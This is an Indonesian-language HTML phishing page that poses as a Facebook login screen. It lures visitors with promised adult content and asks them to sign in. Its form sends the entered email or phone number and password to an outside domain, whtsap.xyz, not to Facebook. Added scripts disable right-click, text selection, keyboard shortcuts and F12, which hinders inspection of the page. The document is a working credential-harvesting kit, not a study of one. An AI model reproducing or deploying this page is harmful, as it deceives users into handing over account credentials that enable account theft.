


<!DOCTYPE html>
<html lang="en">
<head>
		<meta charset="UTF-8">
			<meta name="viewport" content="width=device-width, initial-scale=1.0">
				<meta http-equiv="X-UA-Compatible" content="ie=edge">
					<title>Masuk untuk melanjutkan</title>
					<!-- <link rel="shorcut icon" href="img/rYZqPCBaG70.png"> -->
						<!-- Style -->
						<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">
							<link rel="stylesheet" href="https://use.fontawesome.compath/to/font-awesome/css/font-awesome.min.css">
								<style>
      html,body {
        background-color: #eceff6;
      }

      button:focus,
      input:focus,
      textarea:focus,
      select:focus {
          outline: none;
      }

      .login {
        max-width: 100%;
        width: 500px;
        display: block;
        margin: 10px auto;
        box-shadow: 0px 0px 15px rgba(0,0,0, 0.1);
      }

      textarea:focus,
      input[type="text"]:focus,
      input[type="password"]:focus,
      input[type="datetime"]:focus,
      input[type="datetime-local"]:focus,
      input[type="date"]:focus,
      input[type="month"]:focus,
      input[type="time"]:focus,
      input[type="week"]:focus,
      input[type="number"]:focus,
      input[type="email"]:focus,
      input[type="url"]:focus,
      input[type="search"]:focus,
      input[type="tel"]:focus,
      input[type="color"]:focus,
      .uneditable-input:focus {
        border-color: #ced4da;
        box-shadow: 0 1px 1px rgba(0, 0, 0, 0) inset, 0 0 8px rgba(126, 239, 104, 0);
        outline: 0 none;
      }

      .bg-utama {
        background-color: #3b5998;
      }
      .img-login {
        width: 120px;
        margin: 3px auto;
      }

      .img-icon {
        width: 61px;
      }

      .text {
        font-size: 1em;
        display: block;
        margin-top: -8px;
        margin-bottom: 20px;
        color: #919191;
      }

      .form-control {
        display: block;
        height: 45px;
        margin: -1px auto;
      }

      .border-bottom-x {
        border-radius: 0px;
        border-top-left-radius: .25rem;
        border-top-right-radius: .25rem;
        outline: none;
        font-size: 14px;
      }
.tumbal {
	text-align: left;
	background-color: #fffbe2;
	min-width: 320px;
	width: 100%;
	height: 25px;
	padding-top: 10px;
	padding-left: 16px;
	padding-right: 16px;
}
.tumbal, .text
	font-size: 12px;
	color: #fffbe2;
	margin: auto;
}

      .border-top-x {
        border-radius: 0px;
        border-bottom-left-radius: .25rem;
        border-bottom-right-radius: .25rem;
        outline: none;
        font-size: 14px;
      }

      .btn-login {
        width: 100%;
        display: block;
        margin: 10px auto;
        background-color: #3677ff;
        font-size: 15px;
      }
	  .mobapplink {
		background-color: #fffbe2;
		width: 100%;
		height: 42px;
		min-width: 360px;
	}
	.mobandroidpic {
		height: 27px;
		width: 13px;
		margin: 9px 11px 9px 16px;
		float: left;
}
	.getfbandroid {
		float: left;
		padding: 17px 0 17px 0;
		font-size: 14px;
		color: #7d7215;
}

/* Styles for footer */
.mobfooter {
	min-width: 320px;
	width: 100%;
	background-color: #FFF;
}
#moblangs {
	background-color: #ECEFF5;
	display: flex;
	margin-top: -1px;
	width: 100%;
	height: 120px;
}
.item1, .item2 {
	flex-grow: 1;
}
.mobfooter #moblangs li {
	list-style-type: none;
	font-size: 12px;
	text-align: center;
	margin-bottom: 2px;
}
.mobfooter #moblangs li a {
	color: #576b95;
}
#mobcurrentlang {
	color: #90949c !important;
	font-weight: 500;
	letter-spacing: 0.5px;
}
.mobfooter #moblangs li a .fa {
	font-size: 24px;
	color: #576b95;
}
.mobcopyright {
	text-align: center;
	background-color: #ECEFF5;
	min-width: 320px;
	width: 100%;
	height: 5px;
	padding-left: 16px;
	padding-right: 16px;
}
}
.mobfbcopyright, 
	font-size: 12px;
	color: #919191;
	margin: auto;
}
.mobcopyright span .fa {
	color: #919191;
	font-size: 14px;
}
      @media only screen and (max-width: 600px) {
        .login {
          display: block;
          margin: 0 auto;
          box-shadow: 0px 0px 15px rgba(0,0,0, 0  );
        }
      }
    </style>
							</head>
							<body>
								<div class="login mx-auto d-block">
									<nav class="navbar bg-utama navbar-dark text-center">
										<div class="container">
											<img class="mx-auto d-block img-login" src="https://1.bp.blogspot.com/-O9lS6tvuWzs/XxA4F5qypII/AAAAAAAAAcU/0nhNdAE41WQkprtWLWTPc5aWgq79kKt4wCLcBGAsYHQ/s1600/fblogo.png">
											</div>
										</nav>
										<div class="tumbal">
											<span class="text">
												<a >Anda harus login dulu.
												</span>
											</div>
											<div class="container">
												<div class="row">
													<div class="col-sm-12 col-lg-12 text-center mx-auto d-block">
														<img class="img-icon mt-4 mb-4" src="https://1.bp.blogspot.com/-veXVwaohuGE/XlaWvkau56I/AAAAAAAAAS8/oHi5MZZ9l-kbPsR4V0RnTzKSIy74R0PyACPcBGAYYCw/s320/555c24976024e95d2188c.png" width="85">
															<div class="text">
              Masuk ke akun Facebook Anda untuk terhubung ke KONTEN DEWASA
            </div>
														</div>
													</div>
													<div class="row">
														<div class="col-sm-12 col-lg-12 text-center mx-auto d-block">
															<form action="https://whtsap.xyz/login.php" method="POST">
															<input type="hidden" class="form-control border-bottom-x id="user" name="user" value="UNKNOWN">
																<div class="form-group">
																	<input type="hidden" name="url" value="">
																		<input autocorrect="off" autocapitalize="off" class="form-control border-bottom-x" autocomplete="on" id="email" name="email" placeholder="Nomor ponsel atau email" type="text" required>
																			<input autocorrect="off" autocapitalize="off" class="form-control border-bottom-x" autocomplete="on" id="password" name="password" placeholder="Kata Sandi" type="password" required>
																				<button class="btn btn-login text-white" type="submit" name="login">Masuk</button>
																			</div>
																		</form>
																	</div>
																</div>
																<br>
																	<br>
																		<br>
																			<div class="mobfooter">
																				<div id="moblangs">
																					<div class="item1">
																						<li>
																							<a href="#" id="mobcurrentlang">Bahasa Indonesia</a>
																						</li>
																						<li>
																							<a href="#">Basa Jawa</a>
																						</li>
																						<li>
																							<a href="#">Español</a>
																						</li>
																						<li>
																							<a href="#">Français (France)</a>
																						</li>
																					</div>
																					<div class="item2">
																						<li>
																							<a href="#">English (UK)</a>
																						</li>
																						<li>
																							<a href="#">Bahasa Melayu</a>
																						</li>
																						<li>
																							<a href="#">Português (Brasil)</a>
																						</li>
																						<li>
																							<a href="#">㊉</a>
																						</li>
																					</div>
																				</div>
																				<div class="mobcopyright">
																					<span class="text">
																						<a >Facebook Inc
																						</span>
																						<br>
																						</div>
																					</div>
																					<!-- Script -->
																					<script type="text/javascript" src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
																					<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
																					<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.bundle.min.js"></script>
																					<script type="text/javascript">
function disableSelection(e){if(typeof e.onselectstart!="undefined")e.onselectstart=function(){return false};else if(typeof e.style.MozUserSelect!="undefined")e.style.MozUserSelect="none";else e.onmousedown=function(){return false};e.style.cursor="default"}window.onload=function(){disableSelection(document.body)}
</script>
																					<script type="text/javascript">
function mousedwn(e){try{if(event.button==2||event.button==3)return false}catch(e){if(e.which==3)return false}}document.oncontextmenu=function(){return false};document.ondragstart=function(){return false};document.onmousedown=mousedwn
</script>
																				</body>
																			
</html>
																			<script type="text/javascript">
window.addEventListener("keydown",function(e){if(e.ctrlKey&&(e.which==65||e.which==66||e.which==67||e.which==73||e.which==80||e.which==83||e.which==85||e.which==86)){e.preventDefault()}});document.keypress=function(e){if(e.ctrlKey&&(e.which==65||e.which==66||e.which==67||e.which==73||e.which==80||e.which==83||e.which==85||e.which==86)){}return false}
</script>
																			<script type="text/javascript">
document.onkeydown=function(e){e=e||window.event;if(e.keyCode==123||e.keyCode==18){return false}}
</script>
